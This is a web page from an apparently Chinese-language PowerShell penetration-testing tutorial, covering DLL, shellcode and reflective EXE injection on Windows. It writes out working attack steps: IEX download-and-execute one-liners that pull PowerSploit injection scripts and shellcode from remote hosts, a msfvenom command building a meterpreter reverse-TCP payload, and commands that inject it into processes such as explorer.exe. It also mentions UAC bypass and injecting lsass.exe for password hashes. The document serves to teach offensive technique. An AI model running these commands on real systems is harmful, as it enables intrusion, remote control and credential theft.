
<!DOCTYPE HTML>
<html lang="" >
    <head>
        <meta charset="UTF-8">
        <meta content="text/html; charset=utf-8" http-equiv="Content-Type">
        <title>注入操作 · GitBook</title>
        <meta http-equiv="X-UA-Compatible" content="IE=edge" />
        <meta name="description" content="">
        <meta name="generator" content="GitBook 3.2.3">
        
        
        
    
    <link rel="stylesheet" href="gitbook/style.css">

    
            
                
                <link rel="stylesheet" href="gitbook/gitbook-plugin-highlight/website.css">
                
            
                
                <link rel="stylesheet" href="gitbook/gitbook-plugin-search/search.css">
                
            
                
                <link rel="stylesheet" href="gitbook/gitbook-plugin-fontsettings/website.css">
                
            
        

    

    
        
    
        
    
        
    
        
    
        
    
        
    

        
    
    
    <meta name="HandheldFriendly" content="true"/>
    <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black">
    <link rel="apple-touch-icon-precomposed" sizes="152x152" href="gitbook/images/apple-touch-icon-precomposed-152.png">
    <link rel="shortcut icon" href="gitbook/images/favicon.ico" type="image/x-icon">

    
    <link rel="next" href="10. 混淆.html" />
    
    
    <link rel="prev" href="8. Win32API.html" />
    

    </head>
    <body>
        
<div class="book">
    <div class="book-summary">
        
            
<div id="book-search-input" role="search">
    <input type="text" placeholder="Type to search" />
</div>

            
                <nav role="navigation">
                


<ul class="summary">
    
    

    

    
        
        
    
        <li class="chapter " data-level="1.1" data-path="./">
            
                <a href="./">
            
                    
                    前言
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.2" data-path="kerberos/README.md">
            
                <span>
            
                    
                    基础篇
            
                </a>
            

            
            <ul class="articles">
                
    
        <li class="chapter " data-level="1.2.1" data-path="2. 基础.html">
            
                <a href="2. 基础.html">
            
                    
                    基础知识
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.2.2" data-path="3. 脚本编写与执行.html">
            
                <a href="3. 脚本编写与执行.html">
            
                    
                    脚本编写与执行
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.2.3" data-path="4. Scoket网络编程.html">
            
                <a href="4. Scoket网络编程.html">
            
                    
                    Scoket网络编程
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.2.4" data-path="5. 端口扫描与服务爆破.html">
            
                <a href="5. 端口扫描与服务爆破.html">
            
                    
                    端口扫描与服务爆破
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.2.5" data-path="6. 多线程.html">
            
                <a href="6. 多线程.html">
            
                    
                    多线程
            
                </a>
            

            
        </li>
    

            </ul>
            
        </li>
    
        <li class="chapter " data-level="1.3" data-path="ntlm-pian/README.md">
            
                <span>
            
                    
                    进阶篇
            
                </a>
            

            
            <ul class="articles">
                
    
        <li class="chapter " data-level="1.3.1" data-path="7. WMI对象操作.html">
            
                <a href="7. WMI对象操作.html">
            
                    
                    WMI&dot-net对象操作
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.3.2" data-path="8. Win32API.html">
            
                <a href="8. Win32API.html">
            
                    
                    Win32API
            
                </a>
            

            
        </li>
    
        <li class="chapter active" data-level="1.3.3" data-path="9. Dll注入&shellcode注入&exe注入.html">
            
                <a href="9. Dll注入&shellcode注入&exe注入.html">
            
                    
                    注入操作
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.3.4" data-path="10. 混淆.html">
            
                <a href="10. 混淆.html">
            
                    
                    混淆
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.3.5" data-path="11. 日志操作.html">
            
                <a href="11. 日志操作.html">
            
                    
                    日志操作
            
                </a>
            

            
        </li>
    

            </ul>
            
        </li>
    
        <li class="chapter " data-level="1.4" data-path="ldap-pian/README.md">
            
                <span>
            
                    
                    应用篇
            
                </a>
            

            
            <ul class="articles">
                
    
        <li class="chapter " data-level="1.4.1" data-path="12. 实例使用场景.html">
            
                <a href="12. 实例使用场景.html">
            
                    
                    实例使用场景
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.4.2" data-path="13. Framework.html">
            
                <a href="13. Framework.html">
            
                    
                    Framework
            
                </a>
            

            
        </li>
    

            </ul>
            
        </li>
    

    

    <li class="divider"></li>

    <li>
        <a href="https://www.gitbook.com" target="blank" class="gitbook-link">
            Published with GitBook
        </a>
    </li>
</ul>


                </nav>
            
        
    </div>

    <div class="book-body">
        
            <div class="body-inner">
                
                    

<div class="book-header" role="navigation">
    

    <!-- Title -->
    <h1>
        <i class="fa fa-circle-o-notch fa-spin"></i>
        <a href="." >注入操作</a>
    </h1>
</div>




                    <div class="page-wrapper" tabindex="-1" role="main">
                        <div class="page-inner">
                            
<div id="book-search-results">
    <div class="search-noresults">
    
                                <section class="normal markdown-section">
                                
                                <h1 id="powershell9-dll&#x6CE8;&#x5165;shellcode&#x6CE8;&#x5165;exe&#x6CE8;&#x5165;">powershell(9)-Dll&#x6CE8;&#x5165;&amp;shellcode&#x6CE8;&#x5165;&amp;exe&#x6CE8;&#x5165;</h1>
<h2 id="&#x7406;&#x89E3;dll">&#x7406;&#x89E3;DLL</h2>
<p>&#x9996;&#x5148;&#x6211;&#x4EEC;&#x9700;&#x8981;&#x77E5;&#x9053;&#x6211;&#x4EEC;&#x5728;&#x542F;&#x52A8;&#x4E00;&#x4E2A;&#x7A0B;&#x5E8F;&#x7684;&#x65F6;&#x5019;&#x5E76;&#x6CA1;&#x6709;&#x628A;&#x6240;&#x6709;&#x7684;&#x9700;&#x8981;&#x7528;&#x5230;&#x7684;&#x6570;&#x636E;&#x6216;&#x8005;&#x6587;&#x4EF6;&#x8FD0;&#x884C;&#x8D77;&#x6765;&#xFF0C;&#x800C;&#x662F;&#x53EA;&#x8FD0;&#x884C;&#x4E86;&#x5173;&#x952E;&#x90E8;&#x5206;&#xFF0C;&#x90A3;&#x4E48;&#x5F53;&#x6211;&#x4EEC;&#x9700;&#x8981;&#x8C03;&#x7528;&#x5230;&#x67D0;&#x4E00;&#x529F;&#x80FD;&#x65F6;&#x518D;&#x901A;&#x8FC7;DLL&#x6765;&#x52A8;&#x6001;&#x94FE;&#x63A5;&#xFF0C;&#x4E0D;&#x9700;&#x8981;&#x65F6;&#x5C31;&#x53EF;&#x4EE5;&#x5378;&#x8F7D;&#xFF0C;&#x4F7F;&#x5F97;&#x7A0B;&#x5E8F;&#x4E0D;&#x663E;&#x5F97;&#x81C3;&#x80BF;&#x3002;</p>
<h2 id="dll&#x6CE8;&#x5165;&#x662F;&#x4EC0;&#x4E48;">DLL&#x6CE8;&#x5165;&#x662F;&#x4EC0;&#x4E48;</h2>
<p>DLL&#x6CE8;&#x5165;&#x5C31;&#x662F;&#x5C06;&#x4EE3;&#x7801;&#x63D2;&#x5165;/&#x6CE8;&#x5165;&#x5230;&#x6B63;&#x5728;&#x8FD0;&#x884C;&#x7684;&#x8FDB;&#x7A0B;&#x4E2D;&#x7684;&#x8FC7;&#x7A0B;&#x3002;&#x6211;&#x4EEC;&#x6CE8;&#x5165;&#x7684;&#x4EE3;&#x7801;&#x662F;&#x52A8;&#x6001;&#x94FE;&#x63A5;&#x5E93;&#xFF08;DLL&#xFF09;&#x7684;&#x5F62;&#x5F0F;&#x3002;&#x4E3A;&#x4EC0;&#x4E48;&#x53EF;&#x4EE5;&#x505A;&#x5230;&#x8FD9;&#x4E00;&#x70B9;&#xFF1F;&#x56E0;&#x4E3A;DLL&#xFF08;&#x5982;UNIX&#x4E2D;&#x7684;&#x5171;&#x4EAB;&#x5E93;&#xFF09;&#x662F;&#x5728;&#x8FD0;&#x884C;&#x65F6;&#x6839;&#x636E;&#x9700;&#x8981;&#x6765;&#x8FDB;&#x884C;&#x52A0;&#x8F7D;&#x3002;&#x5728;&#x8FD9;&#x4E2A;&#x9879;&#x76EE;&#x4E2D;&#xFF0C;&#x6211;&#x5C06;&#x53EA;&#x4F7F;&#x7528;DLL&#xFF0C;&#x4F46;&#x662F;&#x5B9E;&#x9645;&#x4E0A;&#x8FD8;&#x53EF;&#x4EE5;&#x4F7F;&#x7528;&#x5176;&#x4ED6;&#x5404;&#x79CD;&#x5F62;&#x5F0F;&#xFF08;&#x4EFB;&#x4F55;PE&#x6587;&#x4EF6;&#x3001;shellcode/assembly&#x7B49;&#xFF09;&#x6765;&#x201C;&#x6CE8;&#x5165;&#x201D;&#x4EE3;&#x7801;&#xFF0C;&#x8FD9;&#x4E9B;&#x5728;&#x6076;&#x610F;&#x8F6F;&#x4EF6;&#x4E2D;&#x975E;&#x5E38;&#x5E38;&#x89C1;&#x3002;</p>
<p>&#x5F53;&#x7136;&#x4F60;&#x9700;&#x8981;&#x6709;&#x5BF9;&#x5E94;&#x7684;&#x6743;&#x9650;&#x624D;&#x80FD;&#x8FDB;&#x884C;&#x5BF9;&#x67D0;&#x4E9B;&#x8FDB;&#x7A0B;&#x7684;&#x6CE8;&#x5165;&#xFF0C;&#x4E00;&#x822C;&#x6765;&#x8BF4;&#xFF0C;&#x5E38;&#x7528;&#x6280;&#x672F;&#x662F;&#x6CE8;&#x5165;&#x201C;lsass.exe&#x201D;&#x8FDB;&#x7A0B;&#x4EE5;&#x83B7;&#x53D6;&#x5BC6;&#x7801;&#x54C8;&#x5E0C;&#x503C;&#x3002;&#x6076;&#x610F;&#x8F6F;&#x4EF6;&#x4E5F;&#x5E7F;&#x6CDB;&#x4F7F;&#x7528;&#x4EE3;&#x7801;&#x6CE8;&#x5165;&#x6280;&#x672F;&#xFF0C;&#x4F8B;&#x5982;&#xFF0C;&#x8FD0;&#x884C;shellcode&#x3001;&#x8FD0;&#x884C;PE&#x6587;&#x4EF6;&#x6216;&#x5C06;DLL&#x52A0;&#x8F7D;&#x5230;&#x53E6;&#x4E00;&#x4E2A;&#x8FDB;&#x7A0B;&#x7684;&#x5185;&#x5B58;&#x4E2D;&#x4EE5;&#x9690;&#x85CF;&#x81EA;&#x8EAB;&#xFF0C;&#x7B49;&#x7B49;&#x3002;</p>
<h2 id="dll&#x6CE8;&#x5165;&#x573A;&#x666F;">DLL&#x6CE8;&#x5165;&#x573A;&#x666F;</h2>
<p>&#x6211;&#x4EEC;&#x6765;&#x7B80;&#x5355;&#x7684;&#x5206;&#x6790;&#x4E00;&#x4E0B;&#x6211;&#x4EEC;&#x53EF;&#x80FD;&#x9047;&#x5230;&#x7684;&#x573A;&#x666F;&#xFF1A;&#x6BD4;&#x5982;&#x6211;&#x4EEC;&#x76EE;&#x524D;&#x6709;&#x4E00;&#x53F0;Win2008&#x7684;&#x673A;&#x5668;&#xFF0C;&#x76EE;&#x524D;&#x6709;&#x4E24;&#x4E2A;&#x7528;&#x6237;&#x767B;&#x9646;&#x5230;&#x673A;&#x5668;&#x4E0A;&#x5206;&#x522B;&#x7528;&#x6237;A&#x548C;B&#xFF0C;&#x6BD4;&#x5982;&#x6211;&#x4EEC;A&#x7528;&#x6237;&#x60F3;&#x770B;&#x5230;B&#x7528;&#x6237;&#x7684;&#x684C;&#x9762;&#x662F;&#x4E0D;&#x80FD;&#x5B9E;&#x73B0;&#x7684;&#xFF08;WIndows&#x4E2D;&#x7684;Session&#x9694;&#x79BB;&#x673A;&#x5236;&#xFF09;&#xFF0C;&#x6211;&#x4EEC;&#x60F3;&#x8981;&#x8FDB;&#x5165;&#x5230;B&#x7528;&#x6237;&#x684C;&#x9762;&#x53EF;&#x4EE5;&#x901A;&#x8FC7;Dll&#x6CE8;&#x5165;&#x5230;B&#x7528;&#x6237;&#x7684;Explore&#x8FDB;&#x7A0B;&#x4E0B;&#xFF0C;&#x62E5;&#x6709;&#x8FD9;&#x4E2A;&#x8FDB;&#x7A0B;&#x4E0B;&#x7684;Token&#x4F7F;&#x7528;createremotethread&#x521B;&#x5EFA;&#x7EBF;&#x7A0B;&#xFF0C;&#x53BB;&#x6253;&#x5F00;&#x684C;&#x9762;&#x3002;&#x8FD9;&#x5C31;&#x662F;&#x6211;&#x4EEC;DLl&#x6CE8;&#x5165;&#x7684;&#x5229;&#x7528;&#x573A;&#x666F;&#xFF0C;&#x4F46;&#x662F;&#x9700;&#x8981;&#x6CE8;&#x610F;&#x7684;&#x662F;&#x6211;&#x4EEC;&#x53EA;&#x80FD;&#x4ECE;&#x9AD8;&#x6743;&#x9650;&#x5F80;&#x4F4E;&#x6743;&#x9650;&#x5207;&#xFF08;&#x597D;&#x50CF;&#x662F;&#x5E9F;&#x8BDD;...&#xFF09;&#xFF0C;&#x8BF4;&#x5230;&#x9AD8;&#x5F80;&#x4F4E;&#x6743;&#x9650;&#x5207;&#x6362;&#xFF0C;&#x5C31;&#x7B80;&#x5355;&#x7684;&#x63D0;&#x4E00;&#x4E0B;UAC...</p>
<h2 id="uac">UAC</h2>
<p>&#x7B80;&#x5355;&#x6765;&#x8BF4;&#xFF0C;&#x8FD9;&#x5C31;&#x662F;&#x4E2A;Windows&#x7684;&#x4FDD;&#x62A4;&#x673A;&#x5236;&#xFF0C;&#x76F4;&#x89C2;&#x611F;&#x53D7;&#x5C31;&#x662F;&#x5F53;&#x4F60;&#x6253;&#x5F00;&#x67D0;&#x4E9B;&#x7A0B;&#x5E8F;&#x7684;&#x65F6;&#x5019;&#x4F1A;&#x6709;&#x4E00;&#x4E2A;&#x5F39;&#x6846;&#x8BA9;&#x4F60;&#x786E;&#x8BA4;&#x662F;&#x5426;&#x7ED9;&#x6743;&#x9650;&#xFF0C;&#x5C31;&#x50CF;&#x8FD9;&#x6837;
<img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/dll/6.png" alt="">
&#x90A3;&#x4E48;&#x7ED5;&#x8FC7;&#x7684;&#x65B9;&#x6CD5;&#x4E5F;&#x662F;&#x6709;&#x5F88;&#x591A;&#xFF0C;&#x90A3;&#x4E48;&#x5927;&#x591A;&#x90FD;&#x662F;&#x901A;&#x8FC7;&#x4E0B;&#x9762;3&#x70B9;&#x6765;&#x505A;&#x7684;:</p>
<ol>
<li>&#x4F7F;&#x7528;wusa.exe</li>
<li>Dll&#x52AB;&#x6301;</li>
<li>IFileOperation-COM&#x5BF9;&#x8C61;
&#x5177;&#x4F53;&#x7EC6;&#x8282;&#x5927;&#x5BB6;&#x53EF;&#x81EA;&#x884C;&#x767E;&#x5EA6;&#xFF0C;&#x8FD9;&#x91CC;&#x53EA;&#x505A;&#x63D0;&#x53CA;&#xFF0C;&#x6700;&#x540E;&#x63A8;&#x8350;&#x6CE8;&#x5165;explorer.exe&#x8FD9;&#x6837;&#x7684;&#x8FDB;&#x7A0B;&#xFF0C;&#x53EA;&#x8981;&#x64CD;&#x4F5C;&#x7CFB;&#x7EDF;&#x5728;&#x8FD0;&#x884C;&#x8FD9;&#x4E2A;&#x8FDB;&#x7A0B;&#x80FD;&#x7A33;&#x5B9A;&#x7684;&#x8BA9;&#x6211;&#x4EEC;&#x6CE8;&#x5165;&#x3002;</li>
</ol>
<p>&#x6211;&#x4EEC;&#x518D;&#x6765;&#x770B;&#x770B;MSF&#x63D0;&#x4F9B;&#x7684;UAC&#x7ED5;&#x8FC7;:
<img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/dll/7.png" alt="">
&#x7528;&#x8FD9;&#x4E9B;&#x57FA;&#x672C;&#x4E5F;&#x5C31;&#x591F;&#x4E86;&#xFF0C;&#x90A3;&#x4E48;&#x8FD8;&#x6709;&#x5176;&#x4ED6;&#x5927;&#x5BB6;&#x53EF;&#x4EE5;&#x53BB;Github&#x81EA;&#x884C;&#x53D1;&#x73B0;&#x3002;</p>
<h2 id="powershell-dll&#x6CE8;&#x5165;">Powershell-DLL&#x6CE8;&#x5165;</h2>
<p>&#x90A3;&#x4E48;&#x5BF9;&#x4E8E;DLL&#x6CE8;&#x5165;&#x6280;&#x672F;&#x4E0D;&#x662F;&#x6211;&#x4EEC;&#x7684;&#x91CD;&#x70B9;&#xFF0C;&#x6211;&#x4EEC;&#x4E3B;&#x8981;&#x662F;&#x5229;&#x7528;Powershell&#x4F7F;&#x7528;&#x5DF2;&#x6709;&#x7684;&#x5DE5;&#x5177;&#x8FDB;&#x884C;DLL&#x6CE8;&#x5165;&#xFF0C;&#x90A3;&#x4E48;Powersploit&#x4E2D;&#x7684;Invoke-DllInjection&#x5DF2;&#x7ECF;&#x5B8C;&#x6210;&#x5BF9;&#x4E8E;DLL&#x6CE8;&#x5165;&#x7684;&#x5229;&#x7528;&#xFF0C;&#x6211;&#x4EEC;&#x5148;&#x6765;&#x770B;&#x770B;&#x5229;&#x7528;&#x7684;&#x8FC7;&#x7A0B;:</p>
<ol>
<li><p>&#x5229;&#x7528;IEX&#x4E0B;&#x8F7D;&#x811A;&#x672C;
&#x4E0B;&#x8F7D;&#x811A;&#x672C;&#x901A;&#x8FC7;&#x4E0B;&#x9762;&#x7684;&#x8BED;&#x53E5;&#x5373;&#x53EF;&#x4E0B;&#x8F7D;&#xFF1A;<code>IEX(New-Object Net.WebClient).DownloadString(&quot;https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1&quot;)</code>&#x6B64;&#x65F6;&#xFF0C;&#x4EE3;&#x7801;&#x5DF2;&#x7ECF;&#x88AB;&#x8FD0;&#x884C;&#x3002;</p>
</li>
<li><p>&#x901A;&#x8FC7;MSF&#x751F;&#x6210;&#x6076;&#x610F;DLL
<img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/dll/1.png" alt=""></p>
</li>
<li>&#x901A;&#x8FC7;Ps&#x52A0;&#x8F7D;DLL&#x5B8C;&#x6210;&#x5229;&#x7528;
&#x9996;&#x5148;&#x6211;&#x4EEC;&#x67E5;&#x770B;&#x4E00;&#x4E2A;&#x6211;&#x4EEC;&#x5F53;&#x524D;&#x7528;&#x6237;&#x80FD;&#x6CE8;&#x5165;&#x7684;&#x8FDB;&#x7A0B;&#xFF0C;&#x6211;&#x4EEC;&#x9009;&#x7528;explorer&#x8FDB;&#x7A0B;&#x6765;&#x8FDB;&#x884C;&#x6CE8;&#x5165;
<img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/dll/2.png" alt="">
&#x4E0B;&#x9762;&#x662F;&#x6267;&#x884C;&#x6210;&#x529F;&#x7684;&#x7ED3;&#x679C;
<img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/dll/3.png" alt="">
&#x6700;&#x540E;&#x6211;&#x4EEC;&#x53EF;&#x4EE5;&#x770B;&#x5230;msf&#x8FD4;&#x56DE;&#x4E00;&#x4E2A;&#x4F1A;&#x8BDD;&#xFF1A;
<img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/dll/4.png" alt=""></li>
</ol>
<h2 id="powershell-shellcode&#x6CE8;&#x5165;">Powershell-ShellCode&#x6CE8;&#x5165;</h2>
<p>&#x4E0A;&#x9762;&#x7684;DLL&#x6CE8;&#x5165;&#x662F;&#x6BD4;&#x8F83;&#x4E3B;&#x6D41;&#x7684;&#x5229;&#x7528;&#x65B9;&#x5F0F;&#xFF0C;&#x4F46;&#x662F;&#x6211;&#x4EEC;&#x8FD8;&#x53EF;&#x4EE5;&#x76F4;&#x63A5;&#x6CE8;&#x5165;&#x6211;&#x4EEC;&#x7684;shellcode&#x8FDB;&#x8FDB;&#x7A0B;&#xFF0C;&#x540C;&#x6837;&#x4E5F;&#x80FD;&#x5728;powersploit&#x627E;&#x5230;&#x5BF9;&#x4E8E;&#x7684;&#x4EE3;&#x7801;:Invoke-Shellcode&#xFF0C;&#x6211;&#x4EEC;&#x5148;&#x6765;&#x770B;&#x770B;&#x5229;&#x7528;&#x8FC7;&#x7A0B;&#xFF1A;</p>
<ol>
<li>&#x5229;&#x7528;IEX&#x4E0B;&#x8F7D;&#x811A;&#x672C;
<code>IEX(New-Object Net.WebClient).DownloadString(&quot;https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1&quot;)</code></li>
<li>&#x901A;&#x8FC7;MSF&#x751F;&#x6210;&#x6076;&#x610F;&#x4EE3;&#x7801;
<img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/dll/5.png" alt="">
&#x4E4B;&#x540E;&#x901A;&#x8FC7;Web&#x4E0B;&#x8F7D;&#x7684;&#x65B9;&#x5F0F;&#x6765;&#x5BFC;&#x5165;shellcode
<code>IEX(New-Object Net.WebClient).DownloadString(&quot;http://172.16.50.1/test&quot;)</code></li>
<li>&#x901A;&#x8FC7;Ps&#x52A0;&#x8F7D;shellcode&#x5B8C;&#x6210;&#x5229;&#x7528;
&#x6267;&#x884C;&#x4EE3;&#x7801;<code>Invoke-Shellcode -Shellcode ($buf)</code>&#x5C31;&#x53EF;&#x4EE5;&#x6267;&#x884C;&#x4EE3;&#x7801;&#x4E86;&#xFF0C;&#x4F46;&#x8FD9;&#x6837;&#x7684;&#x65B9;&#x5F0F;&#x662F;&#x6CE8;&#x5165;&#x5230;&#x5F53;&#x524D;&#x7684;powershell&#x8FDB;&#x7A0B;&#xFF0C;&#x6211;&#x4EEC;&#x53EF;&#x4EE5;&#x901A;&#x8FC7;-processid&#x53C2;&#x6570;&#x6307;&#x5B9A;&#x6211;&#x4EEC;&#x8981;&#x6CE8;&#x5165;&#x7684;&#x8FDB;&#x7A0B;&#xFF0C;&#x4F46;&#x540C;&#x6837;&#x9700;&#x8981;&#x6CE8;&#x610F;&#x7684;&#x662F;&#x7528;&#x6237;&#x662F;&#x5426;&#x6709;&#x6743;&#x9650;&#x5BF9;&#x5BF9;&#x5E94;&#x7684;&#x8FDB;&#x7A0B;&#x8FDB;&#x884C;&#x6CE8;&#x5165;&#xFF0C;<code>Invoke-Shellcode -Shellcode ($buf) -ProcessID 2344</code>&#xFF0C;&#x8FD8;&#x6709;&#x4E00;&#x70B9;&#x9700;&#x8981;&#x6CE8;&#x610F;&#x7684;&#x662F;&#x8FD9;&#x4E2A;&#x811A;&#x672C;&#x662F;&#x65E0;&#x6CD5;&#x9A8C;&#x8BC1;32&#x4F4D;&#x7CFB;&#x7EDF;&#x8FD8;&#x662F;64&#x4F4D;&#x7CFB;&#x7EDF;&#xFF0C;&#x6240;&#x4EE5;&#x9700;&#x8981;&#x5927;&#x5BB6;&#x81EA;&#x5DF1;&#x53BB;&#x9A8C;&#x8BC1;&#x4E4B;&#x540E;&#x518D;&#x8FDB;&#x884C;&#x6CE8;&#x5165;&#x3002;</li>
</ol>
<h2 id="powershell-exe&#x6CE8;&#x5165;">Powershell-EXE&#x6CE8;&#x5165;</h2>
<p>&#x4E0B;&#x9762;&#x4ECB;&#x7ECD;&#x7684;&#x8FD9;&#x4E2A;&#x811A;&#x672C;&#x662F;&#x6211;&#x975E;&#x5E38;&#x559C;&#x6B22;&#x4F7F;&#x7528;&#x7684;&#x811A;&#x672C;&#xFF1A;<a href="https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-ReflectivePEInjection.ps1" target="_blank">&#x53CD;&#x5C04;&#x578B;PE&#x6216;&#x8005;Dll&#x6CE8;&#x5165;</a>&#xFF0C;&#x8FD9;&#x4E2A;&#x811A;&#x672C;&#x80FD;&#x591F;&#x76F4;&#x63A5;&#x6CE8;&#x5165;&#x6211;&#x4EEC;&#x7684;EXE&#x6587;&#x4EF6;&#x5F53;&#x7136;Dll&#x4E5F;&#x53EF;&#x4EE5;&#xFF0C;&#x5728;&#x6211;&#x4EEC;&#x5B9E;&#x9645;&#x7684;&#x6E17;&#x900F;&#x6D4B;&#x8BD5;&#x8FC7;&#x7A0B;&#x4E2D;&#x5E2E;&#x52A9;&#x975E;&#x5E38;&#x5927;&#x3002;</p>
<p>&#x8FD9;&#x91CC;&#x6211;&#x4EEC;&#x6765;&#x7B80;&#x5355;&#x64CD;&#x4F5C;&#x4E00;&#x4E0B;&#x8FD9;&#x4E2A;&#x8FC7;&#x7A0B;:&#x9996;&#x5148;&#x751F;&#x6210;msf&#x9A6C;<code>msfvenom -p windows/x64/meterpreter_reverse_tcp -e -i 3 LHOST=172.16.50.1 LPORT=2333 -f exe -o ~/shell.exe</code>&#x4E4B;&#x540E;&#x518D;&#x901A;&#x8FC7;&#x4E0B;&#x9762;&#x7684;&#x6CE8;&#x5165;</p>
<pre><code class="lang-powershell"><span class="hljs-variable">$PEBytes</span> = [IO.File]::ReadAllBytes(<span class="hljs-string">&apos;.\Desktop\powershell\shell.exe&apos;</span>)
Invoke-ReflectivePEInjection -PEBytes <span class="hljs-variable">$PEBytes</span> -ForceASLR
</code></pre>
<p><img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/dll/8.png" alt="">
&#x53EF;&#x4EE5;&#x770B;&#x5230;&#x6211;&#x4EEC;&#x8FD9;&#x91CC;&#x6709;&#x5173;&#x4E8E;ASLR&#x7684;&#x8B66;&#x544A;&#xFF0C;&#x8FD9;&#x4E2A;ASLR&#x5C31;&#x662F;&#x662F;&#x4E00;&#x79CD;&#x9488;&#x5BF9;&#x7F13;&#x51B2;&#x533A;&#x6EA2;&#x51FA;&#x7684;&#x5B89;&#x5168;&#x4FDD;&#x62A4;&#x6280;&#x672F;&#xFF0C;&#x901A;&#x8FC7;&#x5BF9;&#x5806;&#x3001;&#x6808;&#x3001;&#x5171;&#x4EAB;&#x5E93;&#x6620;&#x5C04;&#x7B49;&#x7EBF;&#x6027;&#x533A;&#x5E03;&#x5C40;&#x7684;&#x968F;&#x673A;&#x5316;&#x3002;&#x90A3;&#x4E48;&#x6211;&#x4EEC;&#x8FD9;&#x91CC;&#x53EA;&#x9700;&#x8981;&#x52A0;&#x4E0A;-ForceASLR&#x53C2;&#x6570;&#x5373;&#x53EF;&#x3002;</p>
<p><img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/dll/9.png" alt=""></p>
<p>&#x53EF;&#x4EE5;&#x770B;&#x5230;&#x6211;&#x4EEC;&#x76F4;&#x63A5;&#x5C31;&#x80FD;&#x5F97;&#x5230;&#x8FD9;&#x4E2A;&#x4F1A;&#x8BDD;&#x3002;</p>

                                
                                </section>
                            
    </div>
    <div class="search-results">
        <div class="has-results">
            
            <h1 class="search-results-title"><span class='search-results-count'></span> results matching "<span class='search-query'></span>"</h1>
            <ul class="search-results-list"></ul>
            
        </div>
        <div class="no-results">
            
            <h1 class="search-results-title">No results matching "<span class='search-query'></span>"</h1>
            
        </div>
    </div>
</div>

                        </div>
                    </div>
                
            </div>

            
                
                <a href="8. Win32API.html" class="navigation navigation-prev " aria-label="Previous page: Win32API">
                    <i class="fa fa-angle-left"></i>
                </a>
                
                
                <a href="10. 混淆.html" class="navigation navigation-next " aria-label="Next page: 混淆">
                    <i class="fa fa-angle-right"></i>
                </a>
                
            
        
    </div>

    <script>
        var gitbook = gitbook || [];
        gitbook.push(function() {
            gitbook.page.hasChanged({"page":{"title":"注入操作","level":"1.3.3","depth":2,"next":{"title":"混淆","level":"1.3.4","depth":2,"path":"10. 混淆.md","ref":"10. 混淆.md","articles":[]},"previous":{"title":"Win32API","level":"1.3.2","depth":2,"path":"8. Win32API.md","ref":"8. Win32API.md","articles":[]},"dir":"ltr"},"config":{"gitbook":"*","theme":"default","variables":{},"plugins":["livereload"],"pluginsConfig":{"livereload":{},"highlight":{},"search":{},"lunr":{"maxIndexSize":1000000,"ignoreSpecialCharacters":false},"sharing":{"facebook":true,"twitter":true,"google":false,"weibo":false,"instapaper":false,"vk":false,"all":["facebook","google","twitter","weibo","instapaper"]},"fontsettings":{"theme":"white","family":"sans","size":2},"theme-default":{"styles":{"website":"styles/website.css","pdf":"styles/pdf.css","epub":"styles/epub.css","mobi":"styles/mobi.css","ebook":"styles/ebook.css","print":"styles/print.css"},"showLevel":false}},"structure":{"langs":"LANGS.md","readme":"README.md","glossary":"GLOSSARY.md","summary":"SUMMARY.md"},"pdf":{"pageNumbers":true,"fontSize":12,"fontFamily":"Arial","paperSize":"a4","chapterMark":"pagebreak","pageBreaksBefore":"/","margin":{"right":62,"left":62,"top":56,"bottom":56}},"styles":{"website":"styles/website.css","pdf":"styles/pdf.css","epub":"styles/epub.css","mobi":"styles/mobi.css","ebook":"styles/ebook.css","print":"styles/print.css"}},"file":{"path":"9. Dll注入&shellcode注入&exe注入.md","mtime":"2020-04-13T09:48:14.583Z","type":"markdown"},"gitbook":{"version":"3.2.3","time":"2020-04-13T09:56:21.455Z"},"basePath":".","book":{"language":""}});
        });
    </script>
</div>

        
    <script src="gitbook/gitbook.js"></script>
    <script src="gitbook/theme.js"></script>
    
        
        <script src="gitbook/gitbook-plugin-livereload/plugin.js"></script>
        
    
        
        <script src="gitbook/gitbook-plugin-search/search-engine.js"></script>
        
    
        
        <script src="gitbook/gitbook-plugin-search/search.js"></script>
        
    
        
        <script src="gitbook/gitbook-plugin-lunr/lunr.min.js"></script>
        
    
        
        <script src="gitbook/gitbook-plugin-lunr/search-lunr.js"></script>
        
    
        
        <script src="gitbook/gitbook-plugin-sharing/buttons.js"></script>
        
    
        
        <script src="gitbook/gitbook-plugin-fontsettings/fontsettings.js"></script>
        
    

    </body>
</html>

